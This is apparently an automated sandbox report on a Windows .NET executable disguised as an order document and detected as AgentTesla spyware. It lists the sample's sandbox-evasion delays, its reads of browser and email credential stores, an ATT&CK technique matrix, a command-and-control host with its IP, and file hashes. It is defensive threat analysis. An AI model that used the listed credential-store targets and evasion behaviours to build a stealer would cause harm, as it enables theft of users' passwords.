                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe TID: 1976Thread sleep time: -98141s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe TID: 1976Thread sleep time: -98031s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe TID: 1976Thread sleep time: -97922s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe TID: 1976Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeThread delayed: delay time: 100000Jump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeThread delayed: delay time: 99884Jump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeThread delayed: delay time: 99781Jump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeThread delayed: delay time: 99672Jump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeThread delayed: delay time: 99563Jump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeThread delayed: delay time: 99438Jump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeThread delayed: delay time: 99313Jump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeThread delayed: delay time: 99188Jump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeThread delayed: delay time: 99063Jump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeThread delayed: delay time: 98953Jump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeThread delayed: delay time: 98812Jump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeThread delayed: delay time: 98703Jump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeThread delayed: delay time: 98594Jump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeThread delayed: delay time: 98469Jump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeThread delayed: delay time: 98359Jump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeThread delayed: delay time: 98250Jump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeThread delayed: delay time: 98141Jump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeThread delayed: delay time: 98031Jump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeThread delayed: delay time: 97922Jump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: NEW ORDER 98540-0.exe, 00000000.00000002.2109019599.00000000042CE000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER 98540-0.exe, 00000000.00000002.2111404130.0000000007620000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: zXcKLHGFsdLEL
                    Source: NEW ORDER 98540-0.exe, 00000003.00000002.3339941783.00000000016A2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeMemory allocated: page read and write | page guardJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeProcess created: C:\Users\user\Desktop\NEW ORDER 98540-0.exe C:\Users\user\Desktop\NEW ORDER 98540-0.exeJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeQueries volume information: C:\Users\user\Desktop\NEW ORDER 98540-0.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeQueries volume information: C:\Users\user\Desktop\NEW ORDER 98540-0.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: 0.2.NEW ORDER 98540-0.exe.438fb80.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.NEW ORDER 98540-0.exe.4355160.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.NEW ORDER 98540-0.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.NEW ORDER 98540-0.exe.4355160.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.NEW ORDER 98540-0.exe.438fb80.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000003.00000002.3341066327.000000000323E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.3341066327.0000000003246000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.3338945387.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.3341066327.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2109019599.00000000042CE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: NEW ORDER 98540-0.exe PID: 6028, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: NEW ORDER 98540-0.exe PID: 5476, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                    Source: Yara matchFile source: 0.2.NEW ORDER 98540-0.exe.438fb80.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.NEW ORDER 98540-0.exe.4355160.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.NEW ORDER 98540-0.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.NEW ORDER 98540-0.exe.4355160.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.NEW ORDER 98540-0.exe.438fb80.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000003.00000002.3338945387.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.3341066327.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2109019599.00000000042CE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: NEW ORDER 98540-0.exe PID: 6028, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: NEW ORDER 98540-0.exe PID: 5476, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Source: Yara matchFile source: 0.2.NEW ORDER 98540-0.exe.438fb80.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.NEW ORDER 98540-0.exe.4355160.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.NEW ORDER 98540-0.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.NEW ORDER 98540-0.exe.4355160.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.NEW ORDER 98540-0.exe.438fb80.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000003.00000002.3341066327.000000000323E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.3341066327.0000000003246000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.3338945387.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.3341066327.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2109019599.00000000042CE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: NEW ORDER 98540-0.exe PID: 6028, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: NEW ORDER 98540-0.exe PID: 5476, type: MEMORYSTR
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
                    Windows Management Instrumentation
                    1
                    DLL Side-Loading
                    11
                    Process Injection
                    1
                    Masquerading
                    1
                    OS Credential Dumping
                    111
                    Security Software Discovery
                    Remote Services1
                    Email Collection
                    1
                    Encrypted Channel
                    Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                    DLL Side-Loading
                    1
                    Disable or Modify Tools
                    1
                    Input Capture
                    1
                    Process Discovery
                    Remote Desktop Protocol1
                    Input Capture
                    1
                    Non-Standard Port
                    Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)141
                    Virtualization/Sandbox Evasion
                    1
                    Credentials in Registry
                    141
                    Virtualization/Sandbox Evasion
                    SMB/Windows Admin Shares11
                    Archive Collected Data
                    1
                    Non-Application Layer Protocol
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                    Process Injection
                    NTDS1
                    Application Window Discovery
                    Distributed Component Object Model1
                    Data from Local System
                    11
                    Application Layer Protocol
                    Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    Deobfuscate/Decode Files or Information
                    LSA Secrets1
                    File and Directory Discovery
                    SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    Obfuscated Files or Information
                    Cached Domain Credentials24
                    System Information Discovery
                    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                    Software Packing
                    DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                    DLL Side-Loading
                    Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    NEW ORDER 98540-0.exe34%ReversingLabsByteCode-MSIL.Trojan.Generic
                    NEW ORDER 98540-0.exe100%Joe Sandbox ML
                    No Antivirus matches
                    No Antivirus matches
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    http://mail.elec-qatar.com0%Avira URL Cloudsafe
                    NameIPActiveMaliciousAntivirus DetectionReputation
                    mail.elec-qatar.com
                    50.87.139.143
                    truetrue
                      unknown
                      NameSourceMaliciousAntivirus DetectionReputation
                      http://mail.elec-qatar.comNEW ORDER 98540-0.exe, 00000003.00000002.3341066327.0000000003246000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://account.dyn.com/NEW ORDER 98540-0.exe, 00000000.00000002.2109019599.00000000042CE000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER 98540-0.exe, 00000003.00000002.3338945387.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                        high
                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs
                        IPDomainCountryFlagASNASN NameMalicious
                        50.87.139.143
                        mail.elec-qatar.comUnited States
                        46606UNIFIEDLAYER-AS-1UStrue
                        Joe Sandbox version:40.0.0 Tourmaline
                        Analysis ID:1408956
                        Start date and time:2024-03-14 14:10:06 +01:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 6m 24s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:8
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:NEW ORDER 98540-0.exe
                        Detection:MAL
                        Classification:mal100.troj.spyw.evad.winEXE@3/1@1/1
                        EGA Information:
                        • Successful, ratio: 100%
                        HCA Information:
                        • Successful, ratio: 96%
                        • Number of executed functions: 69
                        • Number of non-executed functions: 6
                        Cookbook Comments:
                        • Found application associated with file extension: .exe
                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                        • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • VT rate limit hit for: NEW ORDER 98540-0.exe
                        TimeTypeDescription
                        14:10:56API Interceptor20x Sleep call for process: NEW ORDER 98540-0.exe modified
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        50.87.139.143Documents of shipment 3-2024.exeGet hashmaliciousAgentTeslaBrowse
                          SHIPPING DOC.exeGet hashmaliciousAgentTeslaBrowse
                            Order 19A20060.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                              Proforma Invoice.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                  SHIPPING DOC.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                    New order.bat.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                      Quotation R2100131410.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                        SecuriteInfo.com.Trojan.MSIL.Krypt.2433.31957.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                          z92BankingDetails.exeGet hashmaliciousAgentTeslaBrowse
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            mail.elec-qatar.comDocuments of shipment 3-2024.exeGet hashmaliciousAgentTeslaBrowse
                                            • 50.87.139.143
                                            SHIPPING DOC.exeGet hashmaliciousAgentTeslaBrowse
                                            • 50.87.139.143
                                            Order 19A20060.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                            • 50.87.139.143
                                            Proforma Invoice.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                            • 50.87.139.143
                                            SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                            • 50.87.139.143
                                            SHIPPING DOC.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                            • 50.87.139.143
                                            New order.bat.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                            • 50.87.139.143
                                            Quotation R2100131410.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                            • 50.87.139.143
                                            SecuriteInfo.com.Trojan.MSIL.Krypt.2433.31957.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                            • 50.87.139.143
                                            z92BankingDetails.exeGet hashmaliciousAgentTeslaBrowse
                                            • 50.87.139.143
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            UNIFIEDLAYER-AS-1UShttps://cdn.discordapp.com/attachments/1213770114223046679/1217601726979244064/Purchase.js?ex=66049ef9&is=65f229f9&hm=78f5764b16d6d27e20b2688112ea3defcedad34808d12d6c03f8e77c31bc9736&Get hashmaliciousAgentTeslaBrowse
                                            • 192.185.103.198
                                            Delivery note.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                            • 162.240.109.7
                                            CATALOG LISTs#U180ex#U180el#U180ex#U180e..exeGet hashmaliciousFormBookBrowse
                                            • 50.87.223.209
                                            https://www.vipulcopper.com/Get hashmaliciousUnknownBrowse
                                            • 69.49.234.35
                                            https://prezi.com/i/view/NEzvDMiy71AZ2uVfaGcJGet hashmaliciousUnknownBrowse
                                            • 192.185.198.153
                                            wsr3iUW0I0.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, Mars Stealer, PureLog StealerBrowse
                                            • 192.185.16.114
                                            5059367692.exeGet hashmaliciousAgentTeslaBrowse
                                            • 50.87.253.239
                                            https://www.eventcreate.com/e/rfp-reference-recommendatioGet hashmaliciousUnknownBrowse
                                            • 50.116.87.174
                                            https://docusi-recommendations-rfpsecured.us-southeast-1.linodeobjects.com/news.htmlGet hashmaliciousUnknownBrowse
                                            • 50.116.87.174
                                            https://vdvistoria.com.br/xtt/Get hashmaliciousHTMLPhisherBrowse
                                            • 216.172.172.23
                                            No context
                                            No context
                                            Process:C:\Users\user\Desktop\NEW ORDER 98540-0.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):1216
                                            Entropy (8bit):5.34331486778365
                                            Encrypted:false
                                            SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                            MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                            SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                            SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                            SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                            Malicious:false
                                            Reputation:high, very likely benign file
                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                            Entropy (8bit):7.943555772188994
                                            TrID:
                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                            • Win32 Executable (generic) a (10002005/4) 49.78%
                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                            • DOS Executable Generic (2002/1) 0.01%
                                            File name:NEW ORDER 98540-0.exe
                                            File size:700'416 bytes
                                            MD5:df93e537cd7ba3dbc8fefe3e5aff9e0a
                                            SHA1:7a04c2ba75e5bacb7052388d0fe32b2ce3e0fc3b
                                            SHA256:7a20de1b4a4cd2e217be33f3297d2b38d7e7fd69ee216d58f0400160e41ff3ea
                                            SHA512:ef16fae1edae99dbeef552487fbdb22d3f8dba77c38b4ded71206f42db03dc88c62767c82bf56c57c96d3606b7963279b070b5c9ff79c2571343d58bdf8ff53c
                                            SSDEEP:12288:0KM9hCaVbvqZsX5HAT1dTrFATopt+O58/4g1E7nKG7eF:6UbZKgThpHS/4UEV7
                                            TLSH:36E42344BBAB0E83C83D52F95812648853F29662EA72D7CC3EC965D656CDFC9D7802C3
                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....z.e................................. ........@.. ....................................@................................
                                            Icon Hash:6398a462a688d801
                                            Entrypoint:0x4ab19a
                                            Entrypoint Section:.text
                                            Digitally signed:false
                                            Imagebase:0x400000
                                            Subsystem:windows gui
                                            Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                            Time Stamp:0x65F27AEB [Thu Mar 14 04:19:55 2024 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:
                                            OS Version Major:4
                                            OS Version Minor:0
                                            File Version Major:4
                                            File Version Minor:0
                                            Subsystem Version Major:4
                                            Subsystem Version Minor:0
                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                            Instruction
                                            jmp dword ptr [00402000h]
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            NameVirtual AddressVirtual Size Is in Section
                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IMPORT0xab1400x57.text
                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xac0000x1864.rsrc
                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0xae0000xc.reloc
                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
